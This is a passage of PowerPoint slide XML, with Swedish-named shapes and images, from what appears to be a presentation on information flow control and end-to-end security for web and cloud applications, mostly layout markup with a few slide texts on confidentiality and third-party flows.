        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2496876" y="1861930"/>
            <a:ext cx="10762" cy="46168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Rak 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5060052" y="1861930"/>
            <a:ext cx="10762" cy="46168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ruta 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="697953" y="5925936"/>
            <a:ext cx="110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 user</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="textruta 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2934316" y="5925936"/>
            <a:ext cx="1852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Service provider</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cloud user</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="textruta 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6107113" y="5930297"/>
            <a:ext cx="1852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Service provider</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cloud provider</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="textruta 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7742671" y="1943840"/>
            <a:ext cx="1206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parties</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Rak pil 3"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="32" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1493305" y="3058452"/>
            <a:ext cx="2141020" cy="9843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Rak pil 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1806512" y="3240877"/>
            <a:ext cx="1827813" cy="17400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Rak pil 18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4354482" y="2946570"/>
            <a:ext cx="2805676" cy="876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Rak pil 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4354482" y="3034225"/>
            <a:ext cx="2230817" cy="943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Rak pil 28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4354482" y="3139000"/>
            <a:ext cx="2973135" cy="23031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1" name="Bildobjekt 30" descr="images.png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22936" r="880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68" r="18338"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1191193" y="2658275"/>
            <a:ext cx="382022" cy="6598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2" name="Bildobjekt 31" descr="images.png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67742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659"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="698500" y="3795079"/>
            <a:ext cx="794805" cy="4954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3" name="Bildobjekt 32" descr="pc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48" y="4840897"/>
            <a:ext cx="816159" cy="8161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34" name="Rak pil 33"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1646707" y="2947571"/>
            <a:ext cx="19876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6" name="Bildobjekt 35" descr="images.jpg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889" b="89778" l="0" r="100000">
                        <a14:foregroundMark x1="61333" y1="40000" x2="61333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327" y="3685104"/>
            <a:ext cx="853661" cy="853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7" name="Bildobjekt 36" descr="Cloud-Hosting-4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994" y="5008529"/>
            <a:ext cx="831354" cy="831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8" name="Bildobjekt 3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43283" y="2818445"/>
            <a:ext cx="1398775" cy="72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8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ruta 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4942587" y="6341022"/>
            <a:ext cx="3978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en.wikipedia.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/wiki/Web_2.0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rektangel med rundade hörn 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5613400" y="1596159"/>
            <a:ext cx="1574800" cy="4271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alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="90000">
                <a:schemeClr val="accent1">
                  <a:shade val="100000"/>
                  <a:alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">
                  <a:shade val="85000"/>
                  <a:alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="100000" t="100000" r="100000" b="10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ktangel med rundade hörn 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6302087" y="2199777"/>
            <a:ext cx="1327727" cy="38834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alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="90000">
                <a:schemeClr val="accent1">
                  <a:shade val="100000"/>
                  <a:alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">
                  <a:shade val="85000"/>
                  <a:alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="100000" t="100000" r="100000" b="10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ktangel med rundade hörn 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6591300" y="1230176"/>
            <a:ext cx="1460500" cy="32094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alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="90000">
                <a:schemeClr val="accent1">
                  <a:shade val="100000"/>
                  <a:alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">
                  <a:shade val="85000"/>
                  <a:alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="100000" t="100000" r="100000" b="10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ktangel med rundade hörn 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3022600" y="1950729"/>
            <a:ext cx="2082800" cy="353043"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent1">
                  <a:alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="90000">
                <a:schemeClr val="accent1">
                  <a:shade val="100000"/>
                  <a:alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">
                  <a:shade val="85000"/>
                  <a:alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="100000" t="100000" r="100000" b="10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ktangel med rundade hörn 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2120900" y="1428750"/>
            <a:ext cx="2260600" cy="4699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alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="90000">
                <a:schemeClr val="accent1">
                  <a:shade val="100000"/>
                  <a:alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">
                  <a:shade val="85000"/>
                  <a:alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="100000" t="100000" r="100000" b="10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ktangel med rundade hörn 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2413000" y="2331177"/>
            <a:ext cx="762000" cy="26524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alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="90000">
                <a:schemeClr val="accent1">
                  <a:shade val="100000"/>
                  <a:alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">
                  <a:shade val="85000"/>
                  <a:alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="100000" t="100000" r="100000" b="10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ktangel med rundade hörn 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3327400" y="2343315"/>
            <a:ext cx="1206500" cy="29177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alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="90000">
                <a:schemeClr val="accent1">
                  <a:shade val="100000"/>
                  <a:alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">
                  <a:shade val="85000"/>
                  <a:alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="100000" t="100000" r="100000" b="10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ktangel med rundade hörn 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7835900" y="2458729"/>
            <a:ext cx="863600" cy="353043"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent1">
                  <a:alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="90000">
                <a:schemeClr val="accent1">
                  <a:shade val="100000"/>
                  <a:alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">
                  <a:shade val="85000"/>
                  <a:alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="100000" t="100000" r="100000" b="10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ktangel med rundade hörn 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6765059" y="3271529"/>
            <a:ext cx="681182" cy="353043"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent1">
                  <a:alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="90000">
                <a:schemeClr val="accent1">
                  <a:shade val="100000"/>
                  <a:alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">
                  <a:shade val="85000"/>
                  <a:alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="100000" t="100000" r="100000" b="10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ktangel med rundade hörn 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4028186" y="4180977"/>
            <a:ext cx="2169413" cy="38834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alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="90000">
                <a:schemeClr val="accent1">
                  <a:shade val="100000"/>
                  <a:alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">
                  <a:shade val="85000"/>
                  <a:alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="100000" t="100000" r="100000" b="10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ktangel med rundade hörn 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4368800" y="4656859"/>
            <a:ext cx="2603500" cy="4271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alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="90000">
                <a:schemeClr val="accent1">
                  <a:shade val="100000"/>
                  <a:alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">
                  <a:shade val="85000"/>
                  <a:alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="100000" t="100000" r="100000" b="10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ktangel med rundade hörn 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="355600" y="4168277"/>
            <a:ext cx="1473200" cy="38834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alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="90000">
                <a:schemeClr val="accent1">
                  <a:shade val="100000"/>
                  <a:alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">
                  <a:shade val="85000"/>
                  <a:alpha val="24000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="100000" t="100000" r="100000" b="10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750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Protects the confidentiality of user information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password prevented from being sent to other places than the login service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Fundamentally different from access control which suffers from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once access has been given nothing limits the use of the information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involuntary or voluntary information release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Information flow control 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provides end-to-end security – from input to output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security policy defines what information can go where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subsumes access control – prevents information flow that violate the policy</a:t>
            </a:r>
          </a:p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IFC on the client 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851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ktangel med rundade hörn 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7886072" y="2805968"/>
            <a:ext cx="1010050" cy="143689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latshållare för innehåll 38"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460031" y="1998851"/>
            <a:ext cx="4038600" cy="4532382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We have seen how information flow control can offer end-to-end security on the client side.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Assuming a security policy that allows flow back to the 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> party only all other flows are stopped.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Involuntary flows due to programming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mistakes, .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g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S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pankki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Flows due to attacks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But what about the server side?</a:t>
            </a:r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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>side End</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-to-end </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Bildobjekt 2" descr="imgres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155" y="3012644"/>
            <a:ext cx="800354" cy="80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Bildobjekt 15" descr="imgr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785" y="3910740"/>
            <a:ext cx="741793" cy="741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Bildobjekt 4" descr="j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2" y="3578616"/>
            <a:ext cx="664247" cy="664247"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Bildobjekt 11" descr="1366511188978779390free-red-cloud-advertising-m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32" y="5382794"/>
            <a:ext cx="676048" cy="676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Bildobjekt 12" descr="analytics-icon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709" y="5382794"/>
            <a:ext cx="672527" cy="672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4" name="Rak pil 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6074149" y="4703260"/>
            <a:ext cx="350636" cy="67953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Rak pil 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6664973" y="4777087"/>
            <a:ext cx="0" cy="49661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Frihandsfigur 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7064366" y="3405982"/>
            <a:ext cx="903613" cy="472194"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 903613 w 903613"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 472194"/>
              <a:gd name="connsiteX1" fmla="*/ 276782 w 903613"/>
              <a:gd name="connsiteY1" fmla="*/ 162826 h 472194"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 903613"/>
              <a:gd name="connsiteY2" fmla="*/ 472194 h 47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3613" h="472194">
                <a:moveTo>
                  <a:pt x="903613" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="665498" y="42063"/>
                  <a:pt x="427384" y="84127"/>
                  <a:pt x="276782" y="162826"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="126180" y="241525"/>
                  <a:pt x="0" y="472194"/>
                  <a:pt x="0" y="472194"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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Rak pil 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5305482" y="3147902"/>
            <a:ext cx="1133312" cy="97858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2" name="Bildobjekt 21" descr="imgres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978" y="2451356"/>
            <a:ext cx="800354" cy="80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Bildobjekt 17" descr="jQurery.gi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90" y="2549962"/>
            <a:ext cx="462682" cy="462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Bildobjekt 18" descr="modernizr-sticker.jpg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3667" r="963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36" t="18638" r="4562" b="17732"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096380" y="2549962"/>
            <a:ext cx="664624" cy="462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textruta 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4620717" y="2169906"/>
            <a:ext cx="68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CDN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="textruta 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7886072" y="3812998"/>
            <a:ext cx="101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party</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="textruta 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6799630" y="268021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</a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="textruta 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7159779" y="546224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</a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Frihandsfigur 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5506290" y="3660801"/>
            <a:ext cx="2491043" cy="747238"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2491043"/>
              <a:gd name="connsiteY0" fmla="*/ 700149 h 747238"/>
              <a:gd name="connsiteX1" fmla="*/ 1188537 w 2491043"/>
              <a:gd name="connsiteY1" fmla="*/ 708290 h 747238"/>
              <a:gd name="connsiteX2" fmla="*/ 1994463 w 2491043"/>
              <a:gd name="connsiteY2" fmla="*/ 276803 h 747238"/>
              <a:gd name="connsiteX3" fmla="*/ 2491043 w 2491043"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 74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1043" h="747238">
                <a:moveTo>
                  <a:pt x="0" y="700149"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="428063" y="739498"/>
                  <a:pt x="856126" y="778848"/>
                  <a:pt x="1188537" y="708290"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1520948" y="637732"/>
                  <a:pt x="1777379" y="394851"/>
                  <a:pt x="1994463" y="276803"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2211547" y="158755"/>
                  <a:pt x="2491043" y="0"/>
                  <a:pt x="2491043" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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ihandsfigur 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5514431" y="4296679"/>
            <a:ext cx="1092640" cy="1423863"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1092640"/>
              <a:gd name="connsiteY0" fmla="*/ 56130 h 1423863"/>
              <a:gd name="connsiteX1" fmla="*/ 1090849 w 1092640"/>
              <a:gd name="connsiteY1" fmla="*/ 161966 h 1423863"/>
              <a:gd name="connsiteX2" fmla="*/ 276782 w 1092640"/>
              <a:gd name="connsiteY2" fmla="*/ 1423863 h 1423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2640" h="1423863">
                <a:moveTo>
                  <a:pt x="0" y="56130"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="522359" y="-4930"/>
                  <a:pt x="1044719" y="-65989"/>
                  <a:pt x="1090849" y="161966"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1136979" y="389921"/>
                  <a:pt x="276782" y="1423863"/>
                  <a:pt x="276782" y="1423863"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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ihandsfigur 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5522572" y="4263525"/>
            <a:ext cx="1277367" cy="1457017"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1277367"/>
              <a:gd name="connsiteY0" fmla="*/ 89284 h 1457017"/>
              <a:gd name="connsiteX1" fmla="*/ 1172255 w 1277367"/>
              <a:gd name="connsiteY1" fmla="*/ 146273 h 1457017"/>
              <a:gd name="connsiteX2" fmla="*/ 1147833 w 1277367"/>
              <a:gd name="connsiteY2" fmla="*/ 1457017 h 1457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7367" h="1457017">
                <a:moveTo>
                  <a:pt x="0" y="89284"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="490475" y="3800"/>
                  <a:pt x="980950" y="-81683"/>
                  <a:pt x="1172255" y="146273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1363561" y="374229"/>
                  <a:pt x="1255697" y="915623"/>
                  <a:pt x="1147833" y="1457017"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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ihandsfigur 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5514431" y="2162808"/>
            <a:ext cx="1139332" cy="2413336"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1139332"/>
              <a:gd name="connsiteY0" fmla="*/ 2190001 h 2413336"/>
              <a:gd name="connsiteX1" fmla="*/ 1131552 w 1139332"/>
              <a:gd name="connsiteY1" fmla="*/ 2206283 h 2413336"/>
              <a:gd name="connsiteX2" fmla="*/ 529143 w 1139332"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 241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9332" h="2413336">
                <a:moveTo>
                  <a:pt x="0" y="2190001"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="521681" y="2380642"/>
                  <a:pt x="1043362" y="2571283"/>
                  <a:pt x="1131552" y="2206283"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1219742" y="1841283"/>
                  <a:pt x="529143" y="0"/>
                  <a:pt x="529143" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln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Bildobjekt 33" descr="imgres.jpg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209" y="4703260"/>
            <a:ext cx="502123" cy="50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1" name="Rak 40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4498631" y="1808610"/>
            <a:ext cx="0" cy="46279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Bildobjekt 28" descr="search.png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209" y="4112988"/>
            <a:ext cx="504000" cy="50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Bildobjekt 29" descr="Dialog-stop_icon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796" y="3241244"/>
            <a:ext cx="561288" cy="561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Bildobjekt 32" descr="Dialog-stop_icon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469" y="4940271"/>
            <a:ext cx="561288" cy="561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Bildobjekt 35" descr="Dialog-stop_icon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757" y="4745875"/>
            <a:ext cx="561288" cy="561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7" name="Bildobjekt 36" descr="Dialog-stop_icon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92" y="4576144"/>
            <a:ext cx="561288" cy="561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2968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Bildobjekt 29" descr="Cloud-Hosting-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238" y="2747430"/>
            <a:ext cx="831354" cy="831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Systemwide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> end-to-end security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Bildobjekt 3" descr="imgres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989" y="3535427"/>
            <a:ext cx="800354" cy="80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Bildobjekt 14" descr="1366511188978779390free-red-cloud-advertising-m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640" y="5277489"/>
            <a:ext cx="676048" cy="676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Bildobjekt 15" descr="analytics-icon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131" y="5338081"/>
            <a:ext cx="672527" cy="672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Rak pil 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3488906" y="3915612"/>
            <a:ext cx="94311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Rak pil 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2392171" y="4252317"/>
            <a:ext cx="298326" cy="93333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Rak pil 18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3215131" y="4252317"/>
            <a:ext cx="273775" cy="93333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Rak pil 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5398343" y="3398986"/>
            <a:ext cx="1144010" cy="35787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Rak pil 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5298623" y="4199396"/>
            <a:ext cx="860882" cy="5847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Rak pil 21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1720397" y="3330910"/>
            <a:ext cx="860882" cy="4259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Rak pil 22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1720397" y="4024456"/>
            <a:ext cx="860882" cy="2686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Rak 23"/>
          <p:cNvCxnSpPr/>
